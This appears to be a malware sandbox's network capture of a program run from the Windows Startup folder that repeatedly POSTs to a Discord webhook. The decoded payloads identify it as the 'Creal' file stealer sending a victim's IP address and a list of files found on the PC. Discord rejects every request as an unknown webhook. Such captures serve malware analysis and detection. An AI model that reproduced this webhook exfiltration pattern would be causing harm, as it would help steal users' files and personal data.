                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=4221b9ce7cec11efb22a3ec234dfa563; Expires=Wed, 26-Sep-2029 16:19:23 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453964
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RajYrHLG6vYlTXPvHKXXhjCsRgoOTTBE9b8pSMTRKOiaJ7Xn9I%2Frut8jeq2aeq6wJE5i63BIrKrSWJ4YjS%2F%2Ftrs9ySiZumqHvXTCNsHFHAjjdonejEc7hqgvR7Cm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=4221b9ce7cec11efb22a3ec234dfa5633d4c3bceaa996435223b91e78539479daa6b9d5aea988528bc2590d600b05200; Expires=Wed, 26-Sep-2029 16:19:23 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=a6802797d16af97b5cc620c82515f6097c37a1f8-1727453963; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:23 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 7a 73 39 65 66 67 42 33 67 32 64 6f 61 65 6e 31 5f 4f 51 67 70 7a 33 38 70 44 36 6c 56 4a 4e 76 39 4f 6b 4a 6b 4b 77 72 57 47 49 2d 31 37 32 37 34 35 33 39 36 33 35 35 34 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 61 37 64 38 35 37 31 38 37 39 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=zs9efgB3g2doaen1_OQgpz38pD6lVJNv9OkJkKwrWGI-1727453963554-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0a7d8571879-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:23 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                74192.168.2.849789162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:24 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 506
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:24 UTC506OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal | File Stealer"}, "footer": {"text": "Creal Stealer | ht
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:24 UTC1333INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:24 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=42895d0e7cec11ef91567637d37b7708; Expires=Wed, 26-Sep-2029 16:19:24 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453965
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=442Djb16TyaSNYpe9QQFkoRlb6mTtnkFg4LNu2b%2F3PU7acl2c3vefCZ2Mp2ALhDR1FRPAuhhWLmBcR3an7k9pe1eeZ05M%2BdmVgyw3n6Piqw3DG4oBw3hqH5xUD7q"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=42895d0e7cec11ef91567637d37b770897e59a5d830536b2e6f0e7ba71757f723feff8fed87ec33947345731484d413f; Expires=Wed, 26-Sep-2029 16:19:24 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=5b69cb651f261fca4009e01c081c789f863c139a-1727453964; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:24 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 71 47 35 55 4a 64 74 41 71 57 35 36 52 57 47 78 78 45 59 4d 59 70 5f 74 58 50 2e 41 33 31 68 71 55 50 45 74 6c 51 49 78 4b 72 6b 2d 31 37 32 37 34 35 33 39 36 34 32 33 32 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 61 63 30 61 65 61 34 31 65 30 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=qG5UJdtAqW56RWGxxEYMYp_tXP.A31hqUPEtlQIxKrk-1727453964232-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0ac0aea41e0-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:24 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                75192.168.2.849790162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:24 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 506
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:24 UTC506OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal | File Stealer"}, "footer": {"text": "Creal Stealer | ht
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:24 UTC1335INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:24 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=42ef70bc7cec11ef816f96ff52647fd0; Expires=Wed, 26-Sep-2029 16:19:24 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453966
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tHjUECUG8xQx8OVrqY4MWG73YGJU5OhI53E4gSYsEnhvmydrNtTNA6pmyr%2FdtYKlhUArl1YV4%2FYy9t7LifUfwFSNi5EKNklsJvKIwetXSve0zrmLd4vQRR91aj8%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=42ef70bc7cec11ef816f96ff52647fd0cbfa5e1ea799c67133cb6f1f55fea7058518a3dd49dc71281a0b48ecc55cfa14; Expires=Wed, 26-Sep-2029 16:19:24 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=5b69cb651f261fca4009e01c081c789f863c139a-1727453964; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:24 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 67 68 71 30 49 44 71 73 5f 68 45 33 38 49 32 58 38 71 50 4e 6d 38 30 54 58 4f 57 6b 5a 4d 69 36 6b 42 2e 76 37 49 5f 5f 68 58 4d 2d 31 37 32 37 34 35 33 39 36 34 39 30 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 62 30 33 64 37 38 37 63 65 65 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=ghq0IDqs_hE38I2X8qPNm80TXOWkZMi6kB.v7I__hXM-1727453964900-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0b03d787cee-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:24 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                76192.168.2.849791162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:25 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 506
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:25 UTC506OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal | File Stealer"}, "footer": {"text": "Creal Stealer | ht
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:25 UTC1351INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:25 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=4355db5e7cec11ef955696ff52647fd0; Expires=Wed, 26-Sep-2029 16:19:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453966
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4OtqYMhNtt%2FFa0xkAHhbtWzk1SbvdFFdBj%2Be%2FNvCqmvKWDF%2B%2F1KWE0zZ7nhRNU%2F47wHJpojTcHTYtkUgqbmxI1uz%2FnAanSjP%2BjHK3ecRvp%2FRn%2FW9PmBxyuZQmwO%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=4355db5e7cec11ef955696ff52647fd07750bdb5666355c6889dc3c5a2d74bf48f0809a7944cd902d3bbada349182fdb; Expires=Wed, 26-Sep-2029 16:19:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=6afb30d70112b06f4af358280c90e707eb1bb5df-1727453965; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:25 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 4e 4a 6f 4c 50 79 5f 76 33 36 63 45 53 6a 64 44 4e 65 31 52 34 44 34 45 37 52 65 6c 75 37 43 42 72 57 70 61 30 48 4b 58 6e 56 6b 2d 31 37 32 37 34 35 33 39 36 35 35 37 35 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 62 34 38 66 38 33 30 66 33 39 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=NJoLPy_v36cESjdDNe1R4D4E7Relu7CBrWpa0HKXnVk-1727453965575-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0b48f830f39-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:25 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                77192.168.2.849792162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:26 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 506
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:26 UTC506OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal | File Stealer"}, "footer": {"text": "Creal Stealer | ht
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:26 UTC1339INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:26 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=43bc8f027cec11efb1b69e0750befc3d; Expires=Wed, 26-Sep-2029 16:19:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453967
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7aRYifyhXSJ6%2B4KmJFX6GZ1JJvEEF71HzufJCqJNUkiZKPwX8J6VbPs3%2BKaJijOO7NMHPbO2%2BSfVukhwbCnJ%2BZmENn9TNLSs%2BY1Of4DVJAbFvHAEzdFJcxh4S0VG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=43bc8f027cec11efb1b69e0750befc3ddab8243dea90a8e330eba2ca1b5755b0961219a7b124080cbf09b4289a9c7d74; Expires=Wed, 26-Sep-2029 16:19:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=6fc67678e78038628973969bbb16166b1bae5b34-1727453966; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:26 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 74 72 74 66 6d 46 78 62 67 4d 57 41 4b 2e 71 4f 6d 44 2e 35 44 36 39 62 7a 61 4d 4c 70 57 4a 6c 59 6a 70 49 58 75 64 50 42 34 77 2d 31 37 32 37 34 35 33 39 36 36 32 34 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 62 38 39 61 36 35 34 32 34 34 2d 45 57 52 0d 0a 0d 0a
